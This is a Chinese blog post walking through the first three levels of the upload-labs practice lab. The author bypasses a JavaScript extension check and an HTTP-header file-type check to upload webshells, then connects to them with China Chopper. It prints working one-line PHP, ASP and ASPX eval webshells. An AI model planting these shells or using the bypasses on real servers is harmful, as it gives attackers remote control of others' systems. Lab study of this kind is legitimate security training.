web安全 上传漏洞 upload-labs 一到三关

最新推荐文章于 2024-04-15 09:16:53 发布
最新推荐文章于 2024-04-15 09:16:53 发布
阅读量841 收藏 2
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46377671/article/details/109235665
版权

upload-labs

下载地址:github项目地址:https://github.com/c0ny1/upload-labs

安装:下载解压后,直接放在www目录下后,即可使用,看了没有数据库,但是我用的时候有点卡,页面的切换很慢。

webshell

通过上传一句话木马(也就是webshell)到目前web服务目录,从而获得系统权限,asp、php、jsp、aspx皆可。

常见一句话木马:

php:
<?php @eval($_POST['pass'])?>
<?php @eval($_POST['attack']) ?>
asp:
<%eval request ("pass")%>
aspx:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

然后配合中国菜刀使用 得到系统权限,

菜刀下载地址:https://github.com/raddyfiy/caidao-official-version.git

自己对比了md5 应该没问题

第一关:

先上传图片查看情况:

C:\Users\John\AppData\Roaming\Typora\typora-user-images\image-20201022151526154.png

直接上传一句话木马试试
image-20201022151650762.png

不行,那就有了第一个想法 改变一句话木马后缀名,将其拦截下来再进行更改,

抓包发现
image-20201022191708206.png
好像无法进行修改,我在网上查了下,看到有些第一题

转包的结果有更多的内容 可以修改文件后缀名等 我以为是

版本关系我又试了我电脑burp的其他两个版本 都是一样的结果 有以为是浏览器版本但应该不是 网上也没有搜出阿里 后来想了想可能是后台代码决定http头要发的数据

于是此条思路断了,尝试直接更改前端代码 我这里用的是火狐78.3 esr版本,在控制台删除了这段代码 前端绕过
image-20201022193617348.png
然后上传成功了,用得到的图片地址链接用菜刀连接
image-20201022194006808.png

image-20201022194034676.png
然后成功了。

后来我用google试了试 在前端删除代码后不管用依然无法上传

但火狐和google都应该是有缓存的 不知道为什么。

第二关:

直接上传一句话 进行观察
image-20201022194548126.png
错误了,但不是像第一关的弹窗,像之前将函数删除,无变化,这个文件类型判断应该是从后台执行的。

看看能否抓包 解决 发现和第一关一样 但是想到了自己可以改头部内容 之前都是改传递的参数 没试过增删头部内容 于是试了试
image-20201022195717905.pngimage-20201022195903991.pngimage-20201022195922732.png

用菜刀连接图片链接 成功了(工具还是得好好学学)
image-20201022200106270.png
)]

第三关:

直接上传测试:
image-20201023085000449.png

抓包
image-20201023085322738.png
)]

使用菜刀连接 我把病毒防护关了 为什么它会自动关闭 且点击无法运行了???运行后 且没修改成功

image-20201023091557244.png

但我看了下网上其他的 他们抓包的协议头数据为什么比我的多那么多东西

还在学习阶段 有不对的地方请指正 冲冲冲

cat&seven
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
upload-labs一到二十一解题总结
03-18
upload-labs一到二十一解题总结
上传文件漏洞靶场upload-labs
09-27
上传文件漏洞靶场upload-labs,用于练习上传文件漏洞,学习web安全的小白可用。我的博客也有详细的使用教程
Upload-labs
qq_62517352的博客
03-18 503
Pass-01 安装好Upload-labs之后在浏览器中输入http://127.0.0.1/upload-labs/打开靶场 开始上传shell.php 文件发现被禁止了,这个时候我们把浏览器的JavaScript设置为禁止,因为这个是通过前端的js验证,这样我们就可以上传我们的一句话木马文件了 一句话木马文件,密码是888 上传文件后我们把返回的图片文件地址复制一下 打开蚁剑,输入刚得到的地址,密码就是888,测试一下也是连接成功,我们直接可以添加了 添加成功之后我们拿到权限了 ...
upload靶场第三关
2301_79650865的博客
02-01 330
upload靶场第三关,详细教程,phpstudy2018版本的使用~
upload-labs前三关详解
weixin_64429752的博客
02-14 2912
第一(绕过js) 当上传一个php一句话的时候它是不让我们上传的 查看源码发现格式已经有限制了 提示指出是js限制我们的上传格式 那么我们就应该想办法绕过js的查询 我的方法是先用正确的格式上传并用burp进行抓包,然后修改为php格式进行放包 将写好的php复制转换格式进行上传 并进行抓包然后修改格式 放包后就完成了将php格式的一句话传到了服务器 第二 ...
一、文件上传漏洞 低、中、高三级别 详解
Hala
04-16 1589
一、文件上传漏洞 项目实验环境 OWASP Broken Web Apps VM v1.2 靶场
Web安全文件上传(解析)漏洞
zhdf160916的博客
11-21 4724
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1、文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞上传脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上传行为可能导致网站甚至整个服务器被控制。恶
文件上传upload-labs闯
anananan145的博客
07-15 2784
文件上传
upload-labs前三关
weixin_51536807的博客
02-10 768
第一 上传一句话木马试试。 被阻止了。 查看源码,发现是前端验证,会检测你上传的文件是不是 .jpg .png .gif 类型的。 再次上传一句话木马(上传后缀为jpg),再用BP抓包修改后缀为php后放包。 不知道为什么,我改完后在源代码中查到的文件后缀仍为jpg。但问题不大,复制地址后使用蚁剑连接时把后缀改为php也可以连接成功。 第二 先随便上传一个文件试试。 上传成功。那传个一句话试试。 报错了,查看提示。 MIME (Multipurpose Internet Mai
upload-labs 1-3
m0_56135391的博客
04-17 2715
Pass-01 直接上传含有一句话木马的php文件,显示文件上传格式不被允许 查看网页源码,将check File的函数删除 再次上传该php文件,上传成功 复制图片链接,使用蚁剑进行连接,连接成功 Pass-02 查看源码,发现后端php代码只对concent-type进行检查 使用burpsuite进行抓包 将content-type改为image/jpeg 放包,文件成功上传 在蚁剑中输入该文件路径,成功连接 Pass-03 上传php文件,显示不允许上传 将文件后缀名
upload-labs第1-3解题
m0_46412408的博客
08-13 385
payload写一些有可能被解析为php的文件后缀的字符,大小写绕过,双写绕过,一些利用操作系统特性(比如服务器是windows系统的话,结尾加点,加空格,加::$DATA,后缀某几个字母大写),web容器解析漏洞绕过黑名单的后缀……上传带有木马的php文件,可以是一句话木马,这题主要是MIME类型绕过,所以我们要修改Content-Type类型为允许上传的类型(看源代码允许上传的是jpg文件)在本地浏览器中访问上传文件的位置,可以看到没有之前上传的jpg格式的文件,而是修改类型以后直接上传的php文件。.
upload-labs 第1~3
weixin_67813445的博客
02-22 49
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。
upload-labs解析.pdf
10-19
upload-labs通解析
WEB渗透学习-upload-labs靶场
04-20
upload-labs为WEB渗透中文件上传漏洞专项练习靶场,内涵各种文件上传漏洞类型,采用卡制,一共21,由易到难,适合刚接触该漏洞的新手巩固练习
upload-labs19-20以及总结1
08-08
第一步:直接上传php文件,保存名称填成PHP第二步:抓包分析可以看到filename是文件本来的名称,而save_name是传递的参数,此处改为PHP可以绕过
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
upload-labs-master.zip
06-22
文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master
基于机器学习的安全检测 网络入侵检测概述
最新发布
XinxingZh的博客
04-15 489
这种方法要求先建立正常行为的特征轮廓和模 式表示,然后在检测时将具体行为与正常行为进行比较,如果偏差超过一定值,则认为是入侵行为,否则为正常行为。由放置在不同网段的传感器或不同主机的代理来收集信息,包括 系统和网络日志文件、网络流量、非正常的目录和文件改变、非正常的程序执行。不管是哪种类型的IDS,其工作过程大体是相同的,可以分为三个主要的环节,即信 息收集、分类检测和决策,其中分类检测和决策环节是IDS的键,都需要一定的人工智 能技术来支持。因此,这种IDS是对主机入侵行为的检测。
5.3.1 配置交换机 SSH 管理和端口安全
A136767的博客
04-08 769
以上输出显示用户名为zhangsan的用户登录,其中3位VTY线路编号,以路由器作为SSH客户端登录执行SSH命令登录时。交换机基本安全和 SSH管理实验拓扑如图所示。
upload-labs通三关
07-29
通过以上步骤,你可以成功通upload-labs的第三关。 #### 引用[.reference_title] - *1* *3* [文件上传upload-labs闯](https://blog.csdn.net/anananan145/article/details/125787236)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值